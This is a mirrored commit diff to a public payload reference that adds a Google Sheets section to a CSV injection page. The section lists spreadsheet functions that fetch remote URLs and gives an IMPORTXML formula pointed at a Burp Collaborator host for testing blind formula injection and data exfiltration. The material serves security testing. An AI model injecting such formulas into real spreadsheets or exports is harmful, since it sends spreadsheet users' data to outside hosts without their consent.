mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
csv injection: google sheets formulas
This commit is contained in:
parent
38716075f0
commit
0aaad269e2
@ -6,6 +6,7 @@
|
|||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Methodology](#methodology)
|
* [Methodology](#methodology)
|
||||||
|
* [Google Sheets](#google-sheets)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
|
||||||
@ -60,6 +61,23 @@ Technical details of the above payloads:
|
|||||||
- `/C` calc is the file name which in our case is the calc(i.e the calc.exe)
|
- `/C` calc is the file name which in our case is the calc(i.e the calc.exe)
|
||||||
- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data
|
- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data
|
||||||
|
|
||||||
|
### Google Sheets
|
||||||
|
|
||||||
|
Google Sheets allows some additionnal formulas that are able to fetch remote URLs:
|
||||||
|
|
||||||
|
* [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale)
|
||||||
|
* [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string)
|
||||||
|
* [IMPORTHTML](https://support.google.com/docs/answer/3093339)(url, query, index)
|
||||||
|
* [IMPORTFEED](https://support.google.com/docs/answer/3093337)(url, [query], [headers], [num_items])
|
||||||
|
* [IMPORTDATA](https://support.google.com/docs/answer/3093335)(url)
|
||||||
|
|
||||||
|
So one can test blind formula injection or a potential for data exfiltration with:
|
||||||
|
|
||||||
|
```
|
||||||
|
=IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
|
||||||
|
```
|
||||||
|
|
||||||
|
Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization.
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
@ -69,4 +87,4 @@ Technical details of the above payloads:
|
|||||||
- [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://blog.xpnsec.com/from-csv-to-meterpreter/)
|
- [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://blog.xpnsec.com/from-csv-to-meterpreter/)
|
||||||
- [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](http://georgemauer.net/2017/10/07/csv-injection.html)
|
- [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](http://georgemauer.net/2017/10/07/csv-injection.html)
|
||||||
- [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
|
- [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
|
||||||
- [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection - we45 - October 5, 2020](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
|
- [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection - we45 - October 5, 2020](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection)
|
||||||
|
Loading…
Reference in New Issue
Block a user